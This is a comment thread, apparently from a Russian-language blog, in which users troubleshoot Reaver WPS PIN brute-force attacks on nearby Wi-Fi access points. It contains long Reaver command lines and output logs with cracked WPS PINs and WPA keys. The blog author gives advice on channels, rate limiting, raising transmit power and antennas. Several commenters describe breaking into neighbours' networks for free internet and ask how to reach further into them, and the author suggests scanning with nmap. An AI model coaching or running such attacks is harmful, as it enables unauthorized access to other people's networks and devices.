    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M5 message
    [+] Received M5 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] 91.05% complete @ 2012-07-14 05:32:16 (143 seconds/pin)
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [!] WARNING: 10 failed connections in a row
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] 91.05% complete @ 2012-07-14 05:32:28 (144 seconds/pin)
    [+] Trying pin 45480065

    В чём может быть проблема?

  • vedemur says:

    Всем Привет. Прошу вашей помощи. Всё сделано по инструкции, пробовал на 2-х компах и всё один и тот же результат- висит на sending identity response. Сигнал отличный, WPS Locked-no, если давать дополнительные команды, то застревает на [+] Associated with ХХХХХХХХ. Что посоветуете?

    • Hub-lex says:

      Может быть что МАС-фильтр включен.
      Покажите команды, которые вводили и их вывод.

  • Spam says:

    Вопрос.
    Через некоторое время после того,как начинается атака точка доступа периодически пропадает из зоны видимости (не так силен сигнал,как хотелось бы),но вопрос не в том,почему так происходит,а в том,почему после этого происходит:

    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    И так далее пока мониторинг свичится на 1-й канал,на котором и висит точка доступа?
    Весь вопрос в том,можно ли настроить ривер,чтобы даже если он потеряет сигнал,он не переключал интерфейс mon0 на другие каналы а терпеливо ждал появление сигнала от AP на заранее указанном канале?

    Заранее благодарю Вас и надеюсь на скорый ответ!

    • Hub-lex says:

      Покажите какие команду вводили.
      Если идет переключение каналов, скорее всего вы не указали в команде канал на котором работает АР. Канал задается опцией -c номер_канала

  • я says:

    Ув.издатель татьи!
    подскажите в чем может быть причина?
    почему ревер выдает совершенно разные пороли…
    вот результат.
    root@bt:~# reaver -i mon0 -b B0:48:7A:F4:1D:30 -vv -p 00023375

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from B0:48:7A:F4:1D:30
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 4
    [+] Associated with B0:48:7A:F4:1D:30 (ESSID: TP-LINK_F41D30)
    [+] Trying pin 00023375
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 4
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 24 seconds
    [+] WPS PIN: ’00023375′
    [+] WPA PSK: ’1046E116D237C56259EBA7C577DC8F09E800E3698A5E89EF819A7CD0F6E66587′
    [+] AP SSID: ‘Network-b0487af41d30′
    [+] Nothing done, nothing to save.

    root@bt:~# reaver -i mon0 -b B0:48:7A:F4:1D:30 -vv -p 00023375

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from B0:48:7A:F4:1D:30
    [+] Switching mon0 to channel 4
    [+] Associated with B0:48:7A:F4:1D:30 (ESSID: TP-LINK_F41D30)
    [+] Trying pin 00023375
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 9 seconds
    [+] WPS PIN: ’00023375′
    [+] WPA PSK: ‘EE8568793151C695D6D2C7972ABC94DC67A3A446F4068FF259F2091D183B4ED0′
    [+] AP SSID: ‘Network-b0487af41d30′
    [+] Nothing done, nothing to save.

  • я says:

    Ув.издатель татьи!
    подскажите в чем может быть причина?
    почему ревер выдает совершенно разные пороли…
    вот результат.
    root@bt:~# reaver -i mon0 -b B0:48:7A:F4:1D:30 -vv -p 00023375

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from B0:48:7A:F4:1D:30
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 4
    [+] Associated with B0:48:7A:F4:1D:30 (ESSID: TP-LINK_F41D30)
    [+] Trying pin 00023375
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 4
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 24 seconds
    [+] WPS PIN: ’00023375?
    [+] WPA PSK: ’1046E116D237C56259EBA7C577DC8F09E800E3698A5E89EF819A7CD0F6E66587?
    [+] AP SSID: ‘Network-b0487af41d30?
    [+] Nothing done, nothing to save.

    root@bt:~# reaver -i mon0 -b B0:48:7A:F4:1D:30 -vv -p 00023375

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from B0:48:7A:F4:1D:30
    [+] Switching mon0 to channel 4
    [+] Associated with B0:48:7A:F4:1D:30 (ESSID: TP-LINK_F41D30)
    [+] Trying pin 00023375
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 9 seconds
    [+] WPS PIN: ’00023375?
    [+] WPA PSK: ‘EE8568793151C695D6D2C7972ABC94DC67A3A446F4068FF259F2091D183B4ED0?
    [+] AP SSID: ‘Network-b0487af41d30?
    [+] Nothing done, nothing to save

    • iskander says:

      У меня та же ситуация,при каждом взломе одной и той же АР выдаёт разные пароли состоящие из 64-х символов.Да и со второй АР та же борода,и обе TP_LINK
      А Hub-lex ни как не хочет комментировать.
      Ув. hub-lex прошу обратите внимание :?: .

  • ALEX says:

    Уважаемый Hub-lex в моем случае выскакивает:
    WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking. O чем это и как бороться пожалуйста подскажите.
    p.s. в обозримой сети только одна точка с WPC. PWR -52dB.

    • Hub-lex says:

      WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
      АР не позволяет перебирать пины быстро.
      ну а проценты (ход выполнения) идут?

  • ALEX says:

    спасибо за ответ.
    проценты не идут,а постоянно повторяется это сообщение

  • ALEX says:

    Уважаемый Hub-lex, еще вопрос, пару дней назад я сканировал эту точку, добрался до 75 проц остановился по выше указанной причине, к сожалению не сохранил сессию, а далее как сразу при подключении указывает на неспособность обработки. В чем причина и есть ли выход?

  • kolya239 says:

    здравствуйте!подскажите пожалуйста,подключение к сети есть,но без доступа к интернету.

    • Hub-lex says:

      Ну тут все просто, делайте то что делают при обычном анализе локальной сети: ping, traceroute & etc.

      p.s.: может быть просто к Интернету не подключен…смотреть в общем надо

  • kolya239 says:

    диагностика сетей windows7 сообщает:сетевой адаптер не имеет допустимых параметров настройки IP

    • Hub-lex says:

      и причем тут “диагностика сетей windows7″? можете выполнить то, что было написано в предыдущем комментарии? и делайте все в ВТ5. на кой черт вам windows и ее “диагностика сетей windows7″?!

  • kolya239 says:

    я использовал wifiway-3.4_with_inflator.iso там тоже есть ривер,благодаря вашему блогу,за что отдельное спасибо,нашел пароли к двум сетям обе открылись но доступа к интернету нет.С BT5R2-GNOME-64 непонятно,записал образ загрузочной влешки,с неё загрузил BT5,а дальше что делать?устанавливать на жесткий диск или с флешки работать и можно ли установить русский язык?может у вас есть мануал по работе с BT5.

  • tigerslot says:

    For Эдик Суровый

    Вы не правы. Возможно обойти блокировку DD-WRT, осуществляя атаки на рутеры, где он установлен, а также есть возможность использовать еще один метод атак на маршрутизаторы с открытым исходным кодом, о котором подробнее можно узнать в некоторых источниках в сети.

    • Hub-lex says:

      А можно насчет этого более подробно написать или ссылки дать.
      Заранее спасибо.

      p.s.: выйди в скайп, а то словить никак не могу =)

  • xman says:

    какой уровень сигнала можно считать не приемлемым для лома? 70, 80, 90dbm? Не могу никак ушатать точки с wps, у всех сигналы от 70-90dbm

    • Hub-lex says:

      В airodump-ng уровень сигнала обозначается, например так: -40, -65, -35. Обращайте внимание на – “минус”. Из представленных сигналов, самым лучшим будет -35. Потому что, чем ближе к нулю, тем лучше.

      Начинать взлом можно с уровня сигнала ~= -60, -65. Но на самом деле лучше экспериментировать. Бывает такое, что один не может достать с -65, а у другого с таким же уровнем сигнала, все нормально получается.

      • xman says:

        что можете посоветовать по усилению сигнала? У меня стоит TP-LINK TL-WN7200ND (5dbi, 26dbm) по дефолту вообщем. Может влияет этажность? Вывести устройство на крышу или это бесполезно? Взял адаптер, а результатов не получил. Все сети находятся в диапазоне (от -70 до -95). Моя точка в комнате ловится на самой дальней дистанции на уровне -60-65. Хз что и делать, печалька…

        • Hub-lex says:

          На уровень сигнала влияют мощность передатчика и коэф. усиления антенны.
          В ВТ5 можно повысить мощность передатчика таким образом:
          # iw reg set BO
          # iwconfig wlan# txpower 30

          Например моя ALFA в Debian показывает Tx-Power=27 dBm
          wlan2 IEEE 802.11bg ESSID:off/any
          Mode:Managed Access Point: Not-Associated Tx-Power=27 dBm
          Retry long limit:7 RTS thr:off Fragment thr:off
          Encryption key:off
          Power Management:off

          Что насчет увеличения уровня коэф. усиления антенны, то здесь либо купить хорошую антенну с диаграммой направленности узконаправленная/круговая или сделать антенну самому.

          • xman says:

            По поводу мощности передатчика, пробовал увеличивать, но это мне никоим образом не помогало. По поводу антенны, что можете конкретно посоветовать или как можно сделать самому? (если можно ссылку) Я так понял коэф.усиления это есть dbi?

          • Hub-lex says:

            в google пишите – “купить антенну wifi”. вам с какой диаграммой направленности?

          • xman says:

            писать в гугл, эт понятно я уже присмотрел… Насчет направленности без понятия, что и как… Вы говорили о самодельных антеннах, если можно конкретный линк.

          • Hub-lex says:

            По самодельным антеннам тоже в google – “wi fi антенна своими руками”
            https://www.google.ru/#hl=ru&newwindow=1&sclient=psy-ab&q=wi+fi+%D0%B0%D0%BD%D1%82%D0%B5%D0%BD%D0%BD%D0%B0+%D1%81%D0%B2%D0%BE%D0%B8%D0%BC%D0%B8+%D1%80%D1%83%D0%BA%D0%B0%D0%BC%D0%B8&oq=wifi+%D0%B0%D0%BD&gs_l=hp.3.1.0j0i10l2j0.0.0.1.111.0.0.0.0.0.0.0.0..0.0…0.0…1c.T8izOhgwMWo&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.&fp=86cc874f69692107&biw=1280&bih=690

            По диаграмме направленности: тут вам надо решить, что конкретно вы хотите. вот вам простой, но топорный пример -> если будите заниматься вардрайвингом, тогда подойдет узконаправленная. если все такие большую часть времени сидите на месте, тогда с круговой диаграммой направленности. но я бы купил обе, так на всякий случай.

            p.s.: если необходима помощь специалиста по антеннам, обращайтесь. тут как раз классный спец под боком сидит.

  • Max says:

    Люди добрые! Подскажите пожалуйста,нужно ли ждать окончания этой зугрузки,что делать дальше?

    root@bt:~# reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 00:90:4C:C1:AC:21
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 12
    [+] Switching mon0 to channel 13
    [+] Switching mon0 to channel 14
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 12
    [+] Switching mon0 to channel 13
    [+] Switching mon0 to channel 14
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 12
    [+] Switching mon0 to channel 13
    [+] Switching mon0 to channel 14
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 12
    [+] Switching mon0 to channel 13
    [+] Switching mon0 to channel 14
    [+] Switching mon0 to channel 1
    Люди добрые! Подскажите пожалуйста,нужно ли ждать окончания этой зугрузки,что делать дальше?

  • Воха says:

    Подскажите плз….не запускается startx ( тухнет экран и все…..) в BT4 проблема решалась командой fixvesa…в BT5 такая команда отсутствует…

    • Hub-lex says:

      Не знаю, не знаю…у меня такого не было.
      Поищите в google, может быть эта проблема где то обсуждалась.

  • iskander says:

    Что то я не увидел коментов на вопрос “D” и в начале коментариев не помню кто.А именно
    после взлома выдаёт пароль

    [+] WPA PSK: ’4790D9BE8B165AA20979EC6F1B22627CB7A4B5B6C08903181F65A2F2099040134
    пробовал менять МАК своей карты на МАК клиента-который постоянно сидит на этой АР,всё равно пароль не подходит.Да и ещё тема интересная не стоит её закрывать.А,вот вспомнил на второй АР та же ситуация и что интересно на обоих АР TP_LINK.И спасибо АВТОРУ за статью во многом разобрался,и многому научился.Респект иуважуха.

    • asf says:

      в win 7 просто заходим в панель управления-сеть и интернет-центр управлениями сетями-настройка нового подключения-создание и настройка сети-дальше ищем роутер называем свою сеть так же как и SSID если роутеров много, только методом научного тыка -) дальше находим наш AP он спрашивает пин и при правильном вводе выдаеь пароль сети и да здравствует халява
      P.S такое бывает когда провайдер просто подключает не сконфигурирование роутеры, если пользвователь не настроил, то он юзер и можно спокойно пользоватся халявой
      P.S P.S спасибо создателю сайта

      • Hub-lex says:

        В качестве спасибо вы можете щелкнуть по рекламе или сделать перепост статей или рассказать о проекте. Т.е. скажите спасибо действием, а не только словами. Ну а с меня новые и интересные статьи.

      • timon says:

        а как быть если роутер один но он совершенно не тот каторый мне нужен ? и при выполнении всех выше перечисленных операции выдает не тот пароль? что можно сделать ?

        • Hub-lex says:

          Можно по подробнее.

          • timon says:

            в описании выше говорится находите роутер… я нашел но у него вообще какое то левое “Имя”.. ни как не связанное с тем который интересует меня.. далее я переименовываю сеть а роутер не переименовывается и соответственно выдает пароль не от той сети(пароль не подходит) как связан посторонний роутер и необходимая для меня сеть… ?

  • Max says:

    Hub-lex скажи
    # reaver -i mon0 -b 00:90:4C:C1:AC:21 -с №_канала -vv – эту ком.надо вводить в новом терминале или … ???

    • Hub-lex says:

      Как хотите. Вообще, когда wash показал, какие АР c WPS. После этого закрываем Ctrl+C и вводим команду reaver.

  • Sergey says:

    Прошло на ура на двух сетях из трех.

    Не пошло на Tende.

    Автору огромное спастбо за труды, которые будут вознаграждены.

  • Арт says:

    Backtrack 5 R2
    Все сделал по плану, с учетом твоих советов другим…

    Но вот уже 6 часов у меня такая картина…
    …reaver -i mon0 -b … -c 6 -e Denis -vv -A

    [+] Switching mon0 to channel 6
    [+] Waiting for beacon from …
    [+] Associated with … (ESSID: Denis)

    Без каких либо изменений… Робота идет, прога ламает? Мне ждать дальше? :-)

    Я со смарта и не могу предоставить всю последовательность действий:-( *
    Будь добр тыкни меня носом в статью как “подстроить” свой МАС…
    Я уже благодарен тебе за помощь! :-)

    • Hub-lex says:

      Если проценты идут, тогда просто жди. Если нет, тогда присылай ввод и вывод – будем разбираться.

      • Арт says:

        root@bt:~# iwconfig
        lo no wireless extensions.

        wlan0 IEEE 802.11bg ESSID:off/any
        Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
        Retry long limit:7 RTS thr:off Fragment thr:off
        Encryption key:off
        Power Management:off

        eth0 no wireless extensions.

        root@bt:~# airmon-ng start wlan0

        Found 2 processes that could cause trouble.
        If airodump-ng, aireplay-ng or airtun-ng stops working after
        a short period of time, you may want to kill (some of) them!

        PID Name
        2651 dhclient3
        2717 dhclient3
        Process with PID 2651 (dhclient3) is running on interface wlan0

        Interface Chipset Driver

        wlan0 Atheros AR2425 ath5k – [phy0]
        (monitor mode enabled on mon0)

        root@bt:~# airodump-ng mon0

        CH 6 ][ Elapsed: 20 s ][ 2012-08-05 19:42

        BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

        B0:48:7A:F6:F6:80 -70 42 2 0 6 54e. WPA2 CCMP PSK Denis
        90:F6:52:27:E9:34 -86 27 0 0 1 54e. WPA2 CCMP PSK alinka84

        BSSID STATION PWR Rate Lost Frames Probe

        B0:48:7A:F6:F6:80 D0:DF:9A:F0:72:BA -1 54e- 0 0 2

        root@bt:~# reaver -i mon0 -b B0:48:7A:F6:F6:80 -vv

        Reaver v1.4 WiFi Protected Setup Attack Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        [+] Waiting for beacon from B0:48:7A:F6:F6:80
        [+] Switching mon0 to channel 1
        [+] Switching mon0 to channel 2
        [+] Switching mon0 to channel 3
        [+] Switching mon0 to channel 4
        [+] Switching mon0 to channel 6
        [!] WARNING: Failed to associate with B0:48:7A:F6:F6:80 (ESSID: Denis)
        ^C
        [+] Nothing done, nothing to save.

        root@bt:~# reaver -i mon0 -b B0:48:7A:F6:F6:80 -c 6 -e Denis -vv -A

        Reaver v1.4 WiFi Protected Setup Attack Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        [+] Switching mon0 to channel 6
        [+] Waiting for beacon from B0:48:7A:F6:F6:80
        [+] Associated with B0:48:7A:F6:F6:80 (ESSID: Denis)
        Так без изменений 9-10 часов…
        Пробывал еще две сети помучать – такЖе, ну только ждал я по десятку минут…
        Знаю что все эти “точки” настраивал один и тот же человек /провайдер/контора.

        • Hub-lex says:

          Покажи вывод команды wash.

          • Арт says:

            Как её правильно прописать?

          • Hub-lex says:

            wash -i mon0

          • Арт says:

            root@bt:~# airodump-ng mon0

            CH 4 ][ Elapsed: 1 min ][ 2012-08-06 07:09

            BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

            B0:48:7A:F1:CA:4E -88 173 0 0 6 54e. WPA2 CCMP PSK My Net
            00:0C:42:26:C5:86 -95 104 15 0 5 54 . WPA2 CCMP PSK
            20:CF:30:89:2B:09 -100 63 3 0 11 54 WPA2 CCMP PSK NNN
            90:F6:52:27:E9:34 -102 58 0 0 1 54e. WPA2 CCMP PSK alinka84
            00:1D:0F:FE:A2:66 -103 40 7 0 6 54 . WPA2 CCMP PSK home_n
            90:F6:52:6C:4B:A4 -103 49 0 0 1 54e. WPA2 CCMP PSK chuck
            B0:48:7A:CB:F7:6E -103 24 0 0 6 54e. WPA2 CCMP PSK masha
            F8:D1:11:52:A2:D2 -103 10 0 0 6 54e. WPA2 CCMP PSK neznau
            F8:D1:11:3D:4A:B2 -105 9 0 0 4 54e. WPA2 CCMP PSK home.id9
            00:15:6D:E2:8C:9B -105 7 0 0 1 54 . WPA2 TKIP PSK OlegUB
            D8:5D:4C:F5:5C:F2 -106 6 0 0 13 54 . WPA2 CCMP PSK smir
            B0:48:7A:F4:3B:1E -1 0 0 0 118 -1
            BSSID STATION PWR Rate Lost Frames Probe

            root@bt:~# wash -i mon0

            Wash v1.4 WiFi Protected Setup Scan Tool
            Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

            BSSID Channel RSSI WPS Version WPS Locked ESSID
            -----------------------------------------------------------------------------------------------------
            B0:48:7A:F1:CA:4E 6 -88 1.0 No My Net
            F8:D1:11:52:A2:D2 6 -103 1.0 No neznau
            F8:D1:11:3D:4A:B2 4 -102 1.0 No home.id9
            F8:D1:11:35:B6:AB 1 -102 1.0 No home_Artem
            B0:48:7A:A7:FE:00 1 -106 1.0 No TP-LINK_A7FE00

            Как я понимаю все печально?!

          • Hub-lex says:

            Где АР – B0:48:7A:F6:F6:80 (ESSID: Denis)?

          • Арт says:

            На тот момент его небыло вообще… А вот сейчас – есть, но пробую wash… Не ловит Denis’а эта команда…
            И та же ситуация(связь установлена, а проценты не идут)…
            Вот взял на reaver другую точку – дело пошло… Но у Denis’а сигнал по привлекательнее будет, хотелось бы его “нагнуть”…

          • Арт says:

            И еще немного тебя помучаю :-)
            Вот набралось энное количество процентов… а сигнал точки пропал…
            Если она снова появится, процес продолжесть автоматически?
            Можно ли как-то сохранять сесию/процес/прогрес, что бы в дальнейшем его возобновить/продолжить?
            Как?

          • Hub-lex says:

            Да, можно сохранить сессию. О том как сохранять сессию рассказывалось в комментариях, поищи.

  • Арт says:

    Где-то в коментах читал… Hub-lex говорил, что будет статья о том как ломать вифи без wsp…
    Она есть? :)

  • Gloria says:

    Сразу прошу прощения за идиотизм вопроса. Не убивайте, пожалуйста, этим никогда не занималась, довольно слабо представляю, что к чему, но других вариантов не осталось,пэтому придётся разбираться. Скажите, пожалуйста, можно ли с помощью инструментов из Backtrack работать через WiFi адаптер, подключённый к комьютеру по Ethernet?

  • Gloria says:

    Сразу прошу прощения за идиотизм вопроса. Я в этих делах слабо разбираюсь, но других вариантов не осталось, так что попробую понять. Скажите пожалуйста, можно ли в принципе работать с инструментами Backtrack через WiFi устройство, подключённое к комьютеру по Ethernet?

  • Серго says:

    Приветствую! Примерно месяц-полтора назад писал я,что удалось взломать АР,правда аж за четверо суток.Сейчас на АР сменены имя и пароль.PIN известен,но выдаёт ошибку при его посыле.Удаётся начать процесс при посыле первых четырех цифрах pin.Начинается взлом при 90.92%,доходит до 99.99% и дальше ничего.Перебирает эти 99.99% до бесконечности.Что не так?

  • maks says:

    Здравствуйте.
    После ввода команды airdump-ng mon0 выводится сообщение: No command “airdump-ng” found, did you mean:Command”airdump-ng” from package”aircrack-ng” (universe) airdump-ng command not found.
    Подскажите пожалуйста, что делать дальше?

  • billgilbert says:

    Спасибо автору этой замечательной статьи.

    По-моему, это первая нормально написанная статья, охватывающая разные способы взлома, СПАСИБО!

    Кое-что пришлось почерпнуть из других источников (я в Линуксе ноль), но, тем не менее, за неделю упорной работы 4 точки из 5-ти, которые ловятся у меня дома, были успешно взломаны, так или иначе.

    Из них Интернеты есть только в двух, в двух пароли успешно подобраны, Интернеты не выдаются.

    В связи с этим 3 вопроса (если позволите).

    1. Подобрался пароль, подключился с полпинка. Мне по DHCP выдался IP-адрес (10.123.12.120). Интернета нет. Включил через SMAC спуф MAC-адреса клиентв (он был известен – через Windows, с двух компов пытался) – спуф сделался с полпинка, Интернетов нет. В чем может быть дело? Пытался пропинговать весь диапазона сети (вплоть до 255), но пингуюсь лишь сам, да роутер, на который неизвестен пароль (да и логин).

    2. Другая сеть. Подобрался пароль. С трудом проходит (?) подключение, Винда пишет “Подключение ограничено или отсутствует”, IP-адрес не выдается никоим образом. В чем может быть дело?

    3. Ну и третий вопрос – если на точке стоит IP и MAC-фильтрация, в каком случае можно будет к сети подключиться, но не выйти в Интернет, а в каком – даже не подключиться (зная пароль, конечно).

  • Sergey says:

    Как писал выше взлома пару сетей. на одной стоит тп-линк (админ, админ :), на другой сети белкин (ваще без паролей)

    можно ли зайти дальше роутера, зная IP других компов?

    и как далеко? :)))

    • Hub-lex says:

      Начните со сканирования сети – nmap, например.

    • billgilbert says:

      1. Попытка зайти на маршрутизатор не увенчалась успехом (пробовал и 80 порт, и 8080 – быть может, какой-то нестандартный там есть… Но то, что это роутер – 100%, т. к. при выдаче DHCP пишется именно он в качестве шлюза, 10.123.12.1).

      2. Позавчера ситуация очень настороженно изменилась. Без проблем выдался адрес, при попытке зайти на роутер (D-Link 615) и учетная запись User, и Admin были БЕЗ ПАРОЛЕЙ (да-да), никаких MAC-фильтров не было, никакой фильтрации вообще по чему бы то ни было. Лишь в таблице резервирования IP-адресов значились какие-то компьютеры (те, которым DHCP раздавался). Бери да меняй что хочешь.
      При том кабель Интернета значился как Disconnected.
      А вчера снова ни адреса не выдалось, ничего. Я уже начал сомневаться, что именно я охотник…

  • Мурат says:

    здравствуйте!Hub-lex у меня возникли проблемы. Один сам не могу решит помогите пожалуйста ..
    вот ..
    CH 12 ][ Elapsed: 52 s ][ 2012-08-16 09:55
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:25:12:BE:CE:0D -79 62 2 0 1 54 WPA2 TKIP PSK lopus

    BSSID STATION PWR Rate Lost Frames Probe

    00:25:12:BE:CE:0D DC:A9:71:41:33:45 -80 0 - 1 0 4 lopus66

    root@bt:~# reaver -i mon0 -b 00:25:12:BE:CE:0D -c 1 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from 00:25:12:BE:CE:0D
    [!] WARNING: Failed to associate with 00:25:12:BE:CE:0D (ESSID: lopus66)
    [+] Nothing done, nothing to save.

    2раз пробовал только обратите внимание! lopus66

    root@bt:~# reaver -i mon0 -b 00:25:12:BE:CE:0D -c 1 -e lopus66 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

